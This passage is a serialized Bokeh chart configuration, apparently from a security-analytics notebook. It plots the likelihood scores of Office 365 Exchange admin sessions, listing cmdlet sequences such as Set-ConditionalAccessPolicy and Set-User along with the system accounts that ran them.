alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"1346\",\"type\":\"Grid\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1408\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"1333\",\"type\":\"DataRange1d\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1415\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"axis\":{\"id\":\"1339\"},\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"1342\",\"type\":\"Grid\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1409\",\"type\":\"DaysTicker\"},{\"attributes\":{\"axis_label\":\"rarest_window3_likelihood\",\"formatter\":{\"id\":\"1403\"},\"ticker\":{\"id\":\"1344\"}},\"id\":\"1343\",\"type\":\"LinearAxis\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":{\"value\":\"10px\"}},\"id\":\"1384\",\"type\":\"Title\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1414\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"1405\"},{\"id\":\"1406\"},{\"id\":\"1407\"},{\"id\":\"1408\"},{\"id\":\"1409\"},{\"id\":\"1410\"},{\"id\":\"1411\"},{\"id\":\"1412\"},{\"id\":\"1413\"},{\"id\":\"1414\"},{\"id\":\"1415\"},{\"id\":\"1416\"}]},\"id\":\"1340\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"end\":1590653434300.0,\"start\":1584553482700.0},\"id\":\"1331\",\"type\":\"Range1d\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1412\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1410\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"1337\",\"type\":\"LinearScale\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1406\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"1360\"},\"ticker\":{\"id\":\"1340\"}},\"id\":\"1339\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":null,\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1327\"},{\"id\":\"1347\"},{\"id\":\"1348\"},{\"id\":\"1349\"},{\"id\":\"1350\"},{\"id\":\"1351\"}]},\"id\":\"1353\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"1344\",\"type\":\"BasicTicker\"},{\"attributes\":{},\"id\":\"1335\",\"type\":\"LinearScale\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1405\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1351\",\"type\":\"PanTool\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"Tooltip\":\"printf\"},\"tooltips\":[[\"rarest_window3_likelihood\",\"@rarest_window3_likelihood\"],[\"UserId\",\"@UserId\"],[\"rarest_window3\",\"@rarest_window3\"],[\"ClientIP\",\"@ClientIP\"],[\"time_col\",\"@time_col\"]]},\"id\":\"1327\",\"type\":\"HoverTool\"},{\"attributes\":{\"data_source\":{\"id\":\"1387\"},\"glyph\":{\"id\":\"1389\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1390\"},\"selection_glyph\":null,\"view\":{\"id\":\"1392\"}},\"id\":\"1391\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1420\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1421\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1423\",\"type\":\"DaysTicker\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1422\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1427\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1428\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"1362\"},\"glyph\":{\"id\":\"1364\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1365\"},\"selection_glyph\":null,\"view\":{\"id\":\"1367\"}},\"id\":\"1366\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1417\",\"type\":\"Selection\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1424\",\"type\":\"DaysTicker\"},{\"attributes\":{\"data\":{\"ClientIP\":[\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\"],\"TimeGenerated_min\":{\"__ndarray__\":\"AIDbVGggd0IAgL9qcyB3QgCAk//9IndCAIA9+wcjd0IAAILHTiN3QgCAWwpYI3dCAIBegKIjd0IAAM2/qyN3QgCAaPL1IXdCAICHSt0id0IAAAUB8iJ3QgCAF7QGI3dCAIDBbRsjd0IAgIkiMCN3QgCAqt1EI3dCAICci1kjd0IAgHw8biN3QgCAeyd1I3dCAAAp1okjd0IAgGEGlyN3QgAA/berI3dCAIDGi8Ajd0IAAHK90BB3QgAA+zjREHdCAABAbNEQd0IAgMgw0hB3QgCABQbUEHdCAIDi5NYQd0IAgCrT1xB3QgAAzWGAEXdCAADqZYIRd0IAANyRghF3QgCAYRiDEXdCAIBJFoQRd0IAAIN/hBF3QgAAiuaEEXdCAADYVoURd0IAAOPmhRF3QgAAcxCQEXdCAIAvrMYRd0IAAM4TyBF3QgCAaNXIEXdCAIAB+8gRd0IAAAxXyRF3QgCAgEjKEXdCAAA4FMwRd0IAAHsu5hJ3QgCAS/h1E3dCAACt+aETd0IAALE5sxN3QgAAnWazE3dCAAA5n0wUd0IAgFNMwxR3QgAAQ4TpFHdCAICmY+oUd0IAAOKi6hR3QgAAVwIMFXdCAAC34mEVd0IAgNr1aRV3QgAAdweqFXdCAIDBgqoVd0IAAAfqqhV3QgCAyrmrFXdCAID976sVd0IAAMmOrRV3QgAAf8StFXdCAAC/9/0Vd0IAgGs5/hV3QgAABCX/FXdCAIC2Zf8Vd0IAAOyl/xV3QgAAnFkAFndCAACYKgEWd0IAAA8mAhZ3QgCA2UG9F3dCAIBPmccXd0IAABM8Dhh3QgCA34kZGHdCAADzxlIYd0IAACLxYhh3QgCAxFFsGHdCAIBZFp8Yd0IAANb/rhh3QgAA3/q5GHdCAICw0AUZd0IAAFGZWBl3QgCAHAJjGXdCAICF+P0Zd0IAgNddWhp3QgAAPOSPGndCAABuvaIad0IAgOlirBp3QgCAGsX/GndCAACGz0Ubd0IAgNqtURt3QgAA5jiaG3dCAADJcfYbd0IAALxTZxx3QgAAn8qPHHdCAIBo2pocd0IAABY00hx3QgAAZ3zjHHdCAIA8E+0cd0IAAGUE/hx3QgCAAoNSHXdCAAA8NSwed0IAAJXzNx53QgCAy8NbHndCAICiMlwed0IAAOXSXR53QgCA1MN6HndCAABTTn4ed0IAALJXJB93QgCAb3UtH3dCAICo7nUfd0IAAK9DFyB3QgAAPoIhIHdCAAAq/Q4hd0IAgC4eGSF3QgAA+vRkIXdCAADabMEhd0IAAArWwyF3QgCAxovMIXdCAICUP+Ehd0IAgGjy9SF3QgCAA3YJIndCAIBE/Qkid0IAgHVRDCJ3QgAAmgEhIndCAIA7sjUid0IAAE5lSiJ3QgCA0RpfIndCAIAXUHAid0IAgEDJcyJ3QgCAFTh7IndCAIDU8YQid0IAgLPzjyJ3QgCAiDKfIndCAAC7b6oid0IAgG7isyJ3QgCATZ21IndCAADCscUid0IAgK0nxiJ3QgCAm5vIIndCAIBdRsoid0IAgMMF0iJ3QgAAyN/SIndCAACcENMid0IAAHN/0yJ3QgCAUKTTIndCAACTzdMid0IAAMsX1CJ3QgAAXU3VIndCAIB1fdUid0I=\",\"dtype\":\"float64\",\"shape\":[154]},\"UserId\":[\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\"],\"color\":[\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\"],\"index\":[0,1,2,3,4,5,6,7,8,11,15,19,23,27,31,35,39,42,45,46,49,54,128,130,131,132,134,138,139,142,147,148,149,150,151,152,153,154,157,158,160,161,162,163,165,166,167,169,170,172,173,174,175,177,178,179,180,181,183,184,186,188,189,190,191,192,193,194,196,197,198,199,201,203,205,206,208,210,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,229,230,231,232,235,238,240,241,242,243,244,247,254,255,257,258,259,261,263,267,268,272,275,277,291,293,299,307,308,309,313,320,322,323,326,329,335,339,344,349,350,352,354,357,360,362,366,367,374,375,378,383,387,388,389,391,392,393,394,396,397],\"rarest_window3\":[[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"New-Mailbox\",\"Set-Mailbox\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Remove-MailboxLocation\",\"Set-User\"],[\"Remove-MailboxLocation\",\"Set-User\"],[\"Remove-MailboxLocation\",\"Remove-MailboxLocation\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"New-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Remove-MailboxLocation\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"New-App\",\"New-App\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-OwaMailboxPolicy\",\"Set-Mailbox\",\"Add-MailboxPermission\"],[\"Set-OwaMailboxPolicy\",\"Set-Mailbox\",\"Add-MailboxPermission\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Remove-MailboxLocation\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Remove-MailboxLocation\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Remove-MailboxLocation\",\"Set-User\"],[\"Set-ExchangeAssistanceConfig\",\"Set-AdminAuditLogConfig\",\"Set-TenantObjectVersion\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Remove-UnifiedGroup\",\"Remove-UnifiedGroup\"],[\"Remove-UnifiedGroup\",\"Remove-UnifiedGroup\"],[\"Remove-UnifiedGroup\",\"Remove-UnifiedGroup\"],[\"Set-ExchangeAssistanceConfig\",\"Set-TransportConfig\",\"Set-RecipientEnforcementProvisioningPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-User\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-User\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"]],\"rarest_window3_likelihood\":{\"__ndarray__\":\"Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj/mk1whRthQP8emX9S7ybM/x6Zf1LvJsz/Hpl/Uu8mzP8emX9S7ybM/x6Zf1LvJsz/Hpl/Uu8mzP5NgdAvEKk0/k2B0C8QqTT9nym6baQuoP8emX9S7ybM/x6Zf1LvJsz9nym6baQuoP2fKbptpC6g/x6Zf1LvJsz/Hpl/Uu8mzP4ATX5xAOPY+x6Zf1LvJsz/Hpl/Uu8mzP5NgdAvEKk0/x6Zf1LvJsz/Hpl/Uu8mzP2fKbptpC6g/x6Zf1LvJsz8HG9tEBpltPwcb20QGmW0/wXgr+xxSMz/hF2+OujY0P8emX9S7ybM/Z8pum2kLqD/Hpl/Uu8mzP5NgdAvEKk0/x6Zf1LvJsz9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP+aTXCFG2FA/x6Zf1LvJsz9nym6baQuoP8emX9S7ybM/Z8pum2kLqD/Hpl/Uu8mzP2fKbptpC6g/5pNcIUbYUD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP8emX9S7ybM/x6Zf1LvJsz/Hpl/Uu8mzP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/